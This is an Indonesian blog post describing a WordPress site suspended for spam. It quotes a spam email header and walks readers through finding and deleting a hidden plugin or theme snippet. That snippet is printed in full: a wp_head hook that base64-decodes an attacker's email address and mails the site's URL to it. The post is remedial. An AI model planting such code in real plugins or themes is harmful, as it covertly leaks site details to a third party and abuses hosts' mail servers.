[SOLVED] Spamming Wordpress Plugin jaqqscigs@gmail.com


Saya cukup kesal sekali saat mendapati bahwa web saya disuspend oleh hosting saya karena spamming pada salah satu web saya.

Berikut capture header spamming yang dikirimkan oleh hosting saya:

Total Email : 261

contoh header email :

Received: from ayam.n.masterweb.com ([49.50.80.10]
helo=xxxxxxx.masterweb.net) by mxserver3.masterweb.com with esmtps
(TLSv1:DHE-RSA-AES256-SHA:256) (Exim 4.82) (envelope-from
<xxxxxxx@xxxxxxx.masterweb.net>) id 1W6E5J-0003az-Nv for
jaqqscigs@gmail.com; Thu, 23 Jan 2014 13:48:28 +0700
Received: from xxxxxxx by xxxxxxx.masterweb.net with local (Exim 4.82)
(envelope-from <xxxxxxx@xxxxxxx.masterweb.net>) id 1W6E57-0000Jy-RS
for jaqqscigs@gmail.com; Thu, 23 Jan 2014 06:48:06 +0000
To: jaqqscigs@gmail.com
Subject: Wordpress Plugin
Date: Thu, 23 Jan 2014 06:48:05 +0000
From: WordPress xxxxxxx.co.id>
xxxxxxxX-Priority: 3
X-Mailer: PHPMailer 5.2.4
(http://code.google.com/a/apache-extras.org/p/phpmailer/)
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=UTF-8

saya telah mencoba mencari kesana kemari script yang melakukan spamming tersebut dan alhamdulillah terima kasih thank you kepada my brader Reynald Inconnu > https://plus.google.com/118412238806066643290/posts atas pencerahannya disini http://boje-techaswere1.blogspot.com/2013/08/wordpress-and-wamp-sending-delivery.html saya akhirnya bisa menyingkirkan script spam mailphp yang ada pada web saya.

Jika Anda mendapati keluhan yang sama, silakan gunakan panduan singkat ini untuk menghapus script itu dari plugin atau themes wordpress Anda.

Cari kode berikut:

addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==")

karena kode tersebut sama dengan

addressdecode="jaqqscigs@gmail.com";

yang di enkripsi dengan base64 decode

Cara mencari nya bisa dengan menggunakan software pencari kata di dalam file seperti:

http://www.tomsguide.com/us/download/Replace-Handy-Find,0301-4297.html
http://sourceforge.net/projects/findandreplace/
http://findandreplace.codeplex.com/
http://www.softpedia.com/get/System/File-Management/String-Find-and-Replace.shtml
http://download.cnet.com/Find-and-Replace-In-Multiple-Text-Files-Software/3000-2351_4-75748793.html

silakan gunakan salah satu software tersebut dan temukan kode di atas lalu hapus kode berikut:

add_action('wp_head','my_wpfunww439');function my_wpfunww439(){if(!username_exists('wordpress')){$addressdecode=base64_decode("amFxcXNjaWdzQGdtYWlsLmNvbQ==");$vari='Wordpress Plugin';wp_mail($addressdecode,$vari,get_bloginfo('wpurl'));}}

Dengan begitu, website Anda tidak mengirimkan spamming email yang mengganggu server hosting Anda.

Tenkyu Brader Reynald..

Comments

Popular posts from this blog

Windows XP SP3 Product Key

SEF pada Virtuemart

Tentang google page rank